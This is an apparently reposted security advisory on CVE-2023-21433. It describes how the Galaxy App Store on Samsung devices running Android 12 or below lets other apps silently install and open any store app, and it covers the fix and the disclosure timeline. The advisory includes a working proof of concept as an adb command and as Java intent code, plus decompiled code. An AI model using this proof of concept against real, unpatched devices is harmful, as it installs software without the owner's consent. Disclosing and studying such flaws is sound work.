CVE-2023-21433 Details
Original post: https://research.nccgroup.com/2023/01/20/technical-advisory-multiple-vulnerabilities-in-the-galaxy-app-store-cve-2023-21433-cve-2023-21434/
| Product | Galaxy Store 4.5.44.1, other versions affected |
| Severity | High |
| CVE Reference | CVE-2023-21433 |
| Type | Automatic Application Install |
Summary
It was found that the Galaxy App Store has an exported activity which does not handle incoming intents in a safe manner. This allows other applications installed on the same Samsung device to automatically install any application available on the Galaxy App Store without the user’s knowledge.
It should be noted that due to the changes made to Android 13, this issue only affects Samsung devices that are running Android 12 and below.
Impact
A pre-installed rouge application on a Samsung device running Android 12 or below can abuse this issue to install any application currently available on the Galaxy App Store.
Proof of Concept (PoC)
The following adb command can be used to abuse this issue to automatically install the application “Pokemon Go”:
am start -n com.sec.android.app.samsungapps/.detail.alleypopup.AlleyDetailActivity --es GUID com.nianticlabs.pokemongo.ares --ez directInstall true --ez directOpen true
Alternatively, the following Java code can be used to perform the same action:
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.sec.android.app.samsungapps", "com.sec.android.app.samsungapps.detail.alleypopup.AlleyDetailActivity"));
intent.putExtra("GUID", "com.nianticlabs.pokemongo.ares");
intent.putExtra("directInstall", true);
intent.putExtra("directOpen", true);
startActivity(intent);
Technical Walkthrough
After executing the PoC, the activity com.sec.android.app.samsungapps.detail.alleypopup.AlleyDetailActivity method onCreate(bundle) processes the incoming intent. As a part of this function, one of two methods will be executed depending on if the incoming intent contained a data property:
public class AlleyDetailActivity {
...
public void onCreate(Bundle bundle) {
...
Intent intent = getIntent();
Uri data = intent.getData();
...
if (data == null) {
a(intent);
} else {
e();
}
...
}
The PoC did not add a data property to the new intent, so the method a(intent) gets executed, while passing the calling intent as an argument. Within a(intent), the intent and its extras are passed to class com.sec.android.app.samsungapps.detail.alleypopup.AlleyBundleContainer method parseValues(bundle, intent):
public class AlleyDetailActivity {
...
public void a(Intent intent) {
...
Bundle extras = intent.getExtras();
AlleyBundleContainer bundleContainer = getBundleContainer();
...
if (extras != null) {
this.f = bundleContainer.parseValues(extras, intent);
}
...
}
The method parseValues(bundle, intent) parses the intent extras and adds them to a Content object. Some of the important values include:
- “GUID” = the package name of the application to be installed
- ‘directInstall” = if the package should be automatically installed
- “directOpen” = if the application should be opened right after it is installed
public class AlleyBundleContainer {
...
public ContentDetailContainer parseValues(Bundle bundle, Intent intent) {
Content content = new Content();
String string = bundle.getString(“GUID”);
content.setGUID(string);
...
this.g = bundle.getBoolean(“directInstall”, false)
this.h = bundle.getBoolean(“directOpen”, false)
...
return content;
}
Later, since directInstall is set to true, the application will execute the method J() within the AlleyDetailActivity class. This method will then execute the method b(AlleyDetailActivity) within the class com.sec.android.app.samsungapps.detail.alleypopup.b:
public class AlleyDetailActivity {
...
public void J() {
...
if (this.d == Constant_todo.AppType.APP_NOT_INSTALLED || this.d == Constant_todo.AppType.APP_UPDATABLE) {
b.b(this);
}
}
The method b(AlleyDetailActivity) will then setup a task to download and install the target application which was previously specified by the incoming intent. After the application is installed, since directOpen was set to “True”, the Galaxy App Store application will open the newly installed application.
Recommendation
For Samsung devices running Android 12 or lower, Samsung has released an updated version of the Galaxy App Store (version 4.5.49.8). Users should open the Galaxy App Store on their phone, and if prompted, download and install the latest version.
This issue does not affect devices running Android 13. Users should still update their Galaxy App Store to the latest version to address potentially other issues.
Timeline
| Date | Summary |
| 23/11/2022 | Samsung notified of vulnerability |
| 23/11/2022 | Samsung acknowledge receipt of report and a security analyst was assigned to analyze the report |
| 11/12/2022 | Samsung confirmed the vulnerability and rated it as a High risk |
| 01/01/2023 | Samsung has released Galaxy App Store version 4.5.49.8 and has publicly disclosed the issue |